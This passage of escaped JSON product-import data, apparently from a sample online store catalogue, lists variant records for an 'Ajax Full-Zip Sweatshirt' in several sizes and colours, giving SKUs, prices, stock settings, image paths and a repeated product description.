Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ajax-full-zip-sweatshirt-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"177\":{\"sku\":\"MH12-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Ajax Full-Zip Sweatshirt -XS-Green\",\"description\":\"<p>The Ajax Full-Zip Sweatshirt makes the optimal layering or outer piece for archers, golfers, hikers and virtually any other sportsmen. Not only does it have top-notch moisture-wicking abilities, but the tight-weave fabric also prevents pilling from repeated wash-and-wear cycles.<\\/p>\\n<p>&bull; Mint striped full zip hoodie.<br \\/>&bull; 100% bonded polyester fleece.<br \\/>&bull; Pouch pocket.<br \\/>&bull; Rib cuffs and hem. <br \\/>&bull; Machine washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ajax-full-zip-sweatshirt-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh12-green_alt1.jpg,\\/m\\/h\\/mh12-green_back.jpg\",\"image\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh12-green_alt1.jpg,\\/m\\/h\\/mh12-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},\"178\":{\"sku\":\"MH12-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Ajax Full-Zip Sweatshirt -XS-Red\",\"description\":\"<p>The Ajax Full-Zip Sweatshirt makes the optimal layering or outer piece for archers, golfers, hikers and virtually any other sportsmen. Not only does it have top-notch moisture-wicking abilities, but the tight-weave fabric also prevents pilling from repeated wash-and-wear cycles.<\\/p>\\n<p>&bull; Mint striped full zip hoodie.<br \\/>&bull; 100% bonded polyester fleece.<br \\/>&bull; Pouch pocket.<br \\/>&bull; Rib cuffs and hem. <br \\/>&bull; Machine washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ajax-full-zip-sweatshirt-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh12-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh12-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh12-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh12-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh12-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"179\":{\"sku\":\"MH12-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Ajax Full-Zip Sweatshirt -S-Blue\",\"description\":\"<p>The Ajax Full-Zip Sweatshirt makes the optimal layering or outer piece for archers, golfers, hikers and virtually any other sportsmen. Not only does it have top-notch moisture-wicking abilities, but the tight-weave fabric also prevents pilling from repeated wash-and-wear cycles.<\\/p>\\n<p>&bull; Mint striped full zip hoodie.<br \\/>&bull; 100% bonded polyester fleece.<br \\/>&bull; Pouch pocket.<br \\/>&bull; Rib cuffs and hem. <br \\/>&bull; Machine washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ajax-full-zip-sweatshirt-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"180\":{\"sku\":\"MH12-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Ajax Full-Zip Sweatshirt -S-Green\",\"description\":\"<p>The Ajax Full-Zip Sweatshirt makes the optimal layering or outer piece for archers, golfers, hikers and virtually any other sportsmen. Not only does it have top-notch moisture-wicking abilities, but the tight-weave fabric also prevents pilling from repeated wash-and-wear cycles.<\\/p>\\n<p>&bull; Mint striped full zip hoodie.<br \\/>&bull; 100% bonded polyester fleece.<br \\/>&bull; Pouch pocket.<br \\/>&bull; Rib cuffs and hem. <br \\/>&bull; Machine washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ajax-full-zip-sweatshirt-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh12-green_alt1.jpg,\\/m\\/h\\/mh12-green_back.jpg\",\"image\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh12-green_alt1.jpg,\\/m\\/h\\/mh12-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"181\":{\"sku\":\"MH12-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Ajax Full-Zip Sweatshirt -S-Red\",\"description\":\"<p>The Ajax Full-Zip Sweatshirt makes the optimal layering or outer piece for archers, golfers, hikers and virtually any other sportsmen. Not only does it have top-notch moisture-wicking abilities, but the tight-weave fabric also prevents pilling from repeated wash-and-wear cycles.<\\/p>\\n<p>&bull; Mint striped full zip hoodie.<br \\/>&bull; 100% bonded polyester fleece.<br \\/>&bull; Pouch pocket.<br \\/>&bull; Rib cuffs and hem. <br \\/>&bull; Machine washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ajax-full-zip-sweatshirt-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh12-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh12-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh12-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh12-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh12-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"182\":{\"sku\":\"MH12-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Ajax Full-Zip Sweatshirt -M-Blue\",\"description\":\"<p>The Ajax Full-Zip Sweatshirt makes the optimal layering or outer piece for archers, golfers, hikers and virtually any other sportsmen. Not only does it have top-notch moisture-wicking abilities, but the tight-weave fabric also prevents pilling from repeated wash-and-wear cycles.<\\/p>\\n<p>&bull; Mint striped full zip hoodie.<br \\/>&bull; 100% bonded polyester fleece.<br \\/>&bull; Pouch pocket.<br \\/>&bull; Rib cuffs and hem. <br \\/>&bull; Machine washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ajax-full-zip-sweatshirt-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh12-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh12-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh12-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh12-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh12-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"183\":{\"sku\":\"MH12-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Ajax Full-Zip Sweatshirt -M-Green\",\"description\":\"<p>The Ajax Full-Zip Sweatshirt makes the optimal layering or outer piece for archers, golfers, hikers and virtually any other sportsmen. Not only does it have top-notch moisture-wicking abilities, but the tight-weave fabric also prevents pilling from repeated wash-and-wear cycles.<\\/p>\\n<p>&bull; Mint striped full zip hoodie.<br \\/>&bull; 100% bonded polyester fleece.<br \\/>&bull; Pouch pocket.<br \\/>&bull; Rib cuffs and hem. <br \\/>&bull; Machine washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ajax-full-zip-sweatshirt-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh12-green_alt1.jpg,\\/m\\/h\\/mh12-green_back.jpg\",\"image\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh12-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh12-green_alt1.jpg,\\/m\\/h\\/mh12-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"184\":{\"sku\":\"MH12-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Ajax Full-Zip Sweatshirt -M-Red\",\"description\":\"<p>The Ajax Full-Zip Sweatshirt makes the optimal layering or outer piece for archers, golfers, hikers and virtually any other sportsmen. Not only does it have top-notch moisture-wicking abilities, but the tight-weave fabric also prevents pilling from repeated wash-and-wear cycles.<\\/p>\\n<p>&bull; Mint striped full zip hoodie.<br \\/>&bull; 100% bonded polyester fleece.<br \\/>&bull; Pouch pocket.<br \\/>&bull; Rib cuffs and hem. <br \\/>&bull; Machine washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ajax-full-zip-sweatshirt-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh12-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh12-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh12-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh12-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh12-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qt